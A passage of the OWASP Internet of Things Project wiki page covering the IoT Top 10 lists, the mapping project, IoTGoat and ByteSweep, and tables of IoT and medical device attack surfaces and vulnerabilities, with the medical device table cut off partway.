# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon this work, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 10 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's Slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= Seek & Understand =<br />
<br />
== IoT Top 10 ==<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
== OWASP IoT Top 10 2018 Mapping Project ==<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Mappings are not always one-to-one; where no exact match exists, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, "N/A" is given as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical use of the OWASP IoT Top 10. As with all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the OWASP IoT Top 10: [[OWASP_Internet_of_Things_Project|OWASP Internet of Things Project]]. IoTGoat is expected to be released by December 2019.<br />
<br />
To get more information on getting started or how to contribute, visit the project's GitHub: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT firmware security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware.<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and known attacks (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (Wi-Fi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to weak values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified, bypassing almost all software-based security controls.<br />
* Side-channel attacks such as glitching can likewise alter the execution flow, or be used to leak interesting information from the device.<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* Connecting to a serial interface can give full console access to the device.<br />
* Security measures usually include a custom bootloader that prevents an attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
